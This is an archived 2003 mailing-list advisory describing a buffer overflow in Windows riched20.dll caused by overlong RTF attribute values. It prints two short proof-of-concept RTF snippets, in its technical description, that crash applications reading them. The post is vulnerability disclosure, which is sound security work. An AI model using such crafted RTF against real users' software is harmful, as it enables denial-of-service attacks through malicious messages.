Riched20.DLL attribute label buffer overflow vulnerability

From: Jie Dong (Thkrdevat_private)
Date: Sun Feb 16 2003 - 05:30:50 PST

Next message: Niels Provos: "The First Honeyd Challenge"

Previous message: Frog Man: "[VulnWatch] D-Forum (PHP)"
Next in thread: 3APA3A: "Re: Riched20.DLL attribute label buffer overflow vulnerability"
Reply: 3APA3A: "Re: Riched20.DLL attribute label buffer overflow vulnerability"
Reply: Thor Larholm: "Re: Riched20.DLL attribute label buffer overflow vulnerability"
Reply: Marc Ruef: "Re: Riched20.DLL attribute label buffer overflow vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

('binary' encoding is not supported, stored as-is) =========================================================================== ===== Security Defence Stdio vulnerability announcement [001] Riched20.DLL attribute label buffer overflow vulnerability URL:http:\\www.yoursft.com Author: Thrkdev finds date：2003年2月1日 Announce date：2003年2月14日 Affected system: Microsoft Windows 98 Microsoft Windows 2000 Microsoft Windows XP Perhaps,this vulnerability was still in other operating system, but untest . EMAIL: Thkrdevat_private ------------------------------------------------------------------------ Technical description: A buffer overflow vulnerability exists in riched20.dll,which can result in the collapse of the application program that use the corresponding function of the DLL module, But it is very difficult to have the effect of allowing an attacker to execute commands on a user’s system. This problem exists in the analysed RTF file code, and there is an overflows when drawing figure-string( such as the size of the character) in the file form .This overflow seem not to be used for executing commands. The following RTFfile may result in illegal operation : {\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0 \fnil\fprq2\fcharset134 \'cb\'ce\'cc\'e5;}} {\colortbl ;\red255\green0\blue255;} \viewkind4\uc1\pard\cf1\kerning2\f0 \fs18121111111111111111111111111111111110000 www.yoursft.com\fs20\par } "\fs" was used for setting the size of the followingly words "www.yoursft.com". when the figure-string that set the size of the fonts exceeding 1024byte(>1024b) , it Will cause the buffer overflow ;And when exceeding 65536byte(>65536b) it will probably cause crashing the application program. This promblom Not only appear in the setting of "\fs" , other attribute will have the same problem under the similar situation. And this following RTF files Will also result in operating illegally : {\rtf1\ansi\ansicpg936\deff0\deflang1033\deflangfe2052{\fonttbl{\f0 \fnil\fprq2\fcharset134 \'cb\'ce\'cc\'e5;}} {\colortbl ;\red255\green0\blue255;} \viewkind4\uc1\pard\cf1\kerning2\f0121111111111111111111111111111111112222 \fs180 www.yoursft.com\fs20\par } The terrible thing is nowadays lots of software was affected by this vulnerability. The attacker can send a malicious message that include exploiting the vulnerability, then when you read this message your program will be crashed. ------------------------------------------------------------------------ Security Defence Stdio is a software development / technological websites, mainly developing NET security products , the software of Security Defence Stdio --Trojan Ender-- receives users' extensive favorable comment

Next message: Niels Provos: "The First Honeyd Challenge"
Previous message: Frog Man: "[VulnWatch] D-Forum (PHP)"
Next in thread: 3APA3A: "Re: Riched20.DLL attribute label buffer overflow vulnerability"
Reply: 3APA3A: "Re: Riched20.DLL attribute label buffer overflow vulnerability"
Reply: Thor Larholm: "Re: Riched20.DLL attribute label buffer overflow vulnerability"
Reply: Marc Ruef: "Re: Riched20.DLL attribute label buffer overflow vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Feb 17 2003 - 07:37:34 PST